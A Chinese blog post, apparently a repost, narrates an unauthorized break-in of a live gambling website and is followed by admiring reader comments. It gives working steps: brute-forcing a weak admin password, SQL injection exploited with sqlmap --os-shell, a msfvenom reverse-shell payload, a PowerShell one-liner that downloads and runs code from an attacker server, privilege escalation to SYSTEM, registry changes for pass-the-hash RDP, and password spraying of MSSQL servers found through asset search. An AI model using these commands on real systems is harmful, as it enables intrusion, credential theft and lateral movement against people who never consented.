对某菠菜的渗透测试笔记

枫少@KillBoy
枫少@KillBoy
管理员
219
文章
0
粉丝
Web安全 渗透测试207,8231字数 721阅读2分24秒阅读模式
AI智能摘要
你是否好奇黑客是如何一步步攻陷一个网站的?本文记录了一次真实的渗透测试全过程:从弱口令登录后台,到SQL注入获取MSSQL数据库DBA权限,再到通过上传PowerShell脚本上线MSF、提权至system权限,最后利用NTLM哈希远程登录服务器并横向爆破多台数据库。技术细节详实,涵盖漏洞利用、权限提升与内网渗透等关键环节,适合安全从业者或渗透测试学习者参考实战手法。
— AI 生成的文章内容摘要

闲着无聊,网上随便找了一个菠菜进行简单测试,并做笔记记录,大佬们轻喷,有什么不足之处请指教。

弱口令

访问网站就是一个登录页面,没有验证码直接 bp 开启,成功爆出弱口令 admin/123456,直接进入后台。

对某菠菜的渗透测试笔记-图片1

sql注入获取权限

翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。直接选择放弃,继续寻找。在某一个 /GroupMember.aspx?gid= 参数上加上单引号,直接报错,SQL 注入这不就来了么。

对某菠菜的渗透测试笔记-图片2

说干就干,直接 SQLMAP

对某菠菜的渗透测试笔记-图片3

发现为 MSSQL,且 DBA 权限,直接 --os-shell

上线msf

已经获取普通权限,接下来就是上线 msf 提权。msf 生成 powershell 脚本,并放置在网站目录下

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1

对某菠菜的渗透测试笔记-图片4

Vps 开启监听

使用 powershell 上线 session

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))"

如果想要通过 url 拼接堆叠执行 powershell 会存在一个问题,就是单引号闭合问题。我们可以通过对 powershell 进行编码一下,这样就可以绕过单引号的问题。下面推荐一个不错的网站。

https://r0yanx.com/tools/java_exec_encode/

提权

session 已经上线,接下来目标就是获取 system 权限。很幸运直接 getsystem 可以获取 system 权限。如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。

对某菠菜的渗透测试笔记-图片5

迁移一下进程,防止进程掉线。

对某菠菜的渗透测试笔记-图片6

远程登录服务器

发现服务器开启 3389 端口,因为是 system 权限,且为 2012 系统,大于 2008 版本都是无法抓到明文密码,直接修改 adminnistrator 密码。(实战中不推荐直接修改管理员密码)

对某菠菜的渗透测试笔记-图片7

利用hash远程登录管理员账号

因为是 win2012 无法获取明文密码,直接修改管理员密码稍有些不妥。尝试通过获取管理员 NTLM 远程登录机器。(并非同一台,这只是提供一个思路)

对某菠菜的渗透测试笔记-图片8

使用 hash 远程登录 RDP,需要开启 "Restricted Admin Mode"

// 开启Restricted Admin mode
REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

// 查看是否已开启,0x0则表示开启
REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

对某菠菜的渗透测试笔记-图片9

成功利用 hash 远程管理员桌面

对某菠菜的渗透测试笔记-图片10

其他

前期发现 1433 端口开放着,寻找数据库配置文件,登录数据库。

对某菠菜的渗透测试笔记-图片11

通过 fofa 找了一下,资产还是挺多的,且很多都开放 1433 端口,猜测会存在同一个人部署的网站,尝试用获取的密码对这些资产的 1433 端口进行爆破,成功撞到几台数据库,且都是 sa 权限。结束。

对某菠菜的渗透测试笔记-图片12

 

本文作者:kone原文地址:https://xz.aliyun.com/t/12501

 
枫少@KillBoy
评论  20  访客  20
    • 银灰流光
      银灰流光 1

      弱口令还是admin/123456?这菠菜也太不设防了吧😂

      • 洱海月光
        洱海月光 0

        上传白名单拦了就跑,后面SQL注入倒是挺顺的

        • 漂浮的数学公式
          漂浮的数学公式 1

          MSSQL直接DBA权限,运气真不错啊

          • 末日咏叹
            末日咏叹 0

            求问下那个powershell编码网站还能用吗?刚试了打不开🤔

            • 幻想漂流瓶
              幻想漂流瓶 0

              我之前也测过类似站,3389开了但死活提不了权,楼主这getsystem一次成功有点羡慕

              • Flibbertigibbet
                Flibbertigibbet 0

                又是菠菜站…感觉这类目标漏洞都快成模板了

                • 狼崽灰灰
                  狼崽灰灰 0

                  win2012改密码确实风险大,hash登录那步操作很稳👍

                  • 避世小鹿
                    避世小鹿 0

                    土豆家族提权现在还管用?我以为早被修完了

                    • Fandango
                      Fandango 1

                      看到1433爆破成功那段,突然想起自己上周撞库失败的经历…唉

                        • 行客记
                          行客记 0

                          @ Fandango 感觉这种站资产都挺多的,撞库成功率应该不低。

                        • 棉花糖热可可
                          棉花糖热可可 0

                          直接–os-shell上线msf,这流程丝滑得有点离谱啊

                          • 幻剑流
                            幻剑流 0

                            这波操作太丝滑了,从弱口令到拿shell一气呵成,羡慕这运气。

                            • 14
                              14 0

                              那个绕过单引号的编码网站收藏了,之前就卡在这。

                              • 社交死角
                                社交死角 0

                                修改管理员密码确实有点莽,不过测试环境无所谓了。

                                • 骆驼慢慢
                                  骆驼慢慢 0

                                  弱口令爆破那里,直接用bp开搞,速度应该很快吧?

                                  • 七仙女下凡
                                    七仙女下凡 1

                                    之前也搞过几个站,上传口加白名单是常态,后面基本都是靠注入。

                                    • Josephtug
                                      Josephtug 3

                                      我关注这样的资源, 这里展示真正的旅游。这个页面 就是 正是这样的。加油。 [url=https://iqvel.com/zh-Hans/country/%E6%9F%AC%E5%9F%94%E5%AF%A8]最佳季節[/url] 有教育意义的 旅行者博客! 请继续保持!

                                      • AI终结者
                                        AI终结者 0

                                        看到getsystem成功就想起我上次提权搞了俩小时,人麻了。

                                        • 月影孤行
                                          月影孤行 1

                                          @千问 你行你上啊,这波操作我服了

                                            • qianwen
                                              qianwen 2

                                              @ 月影孤行 服了就行,这波操作确实有点东西,弱口令和SQL注入都给碰上了。

                                          匿名

                                          发表评论

                                          匿名网友

                                          拖动滑块以完成验证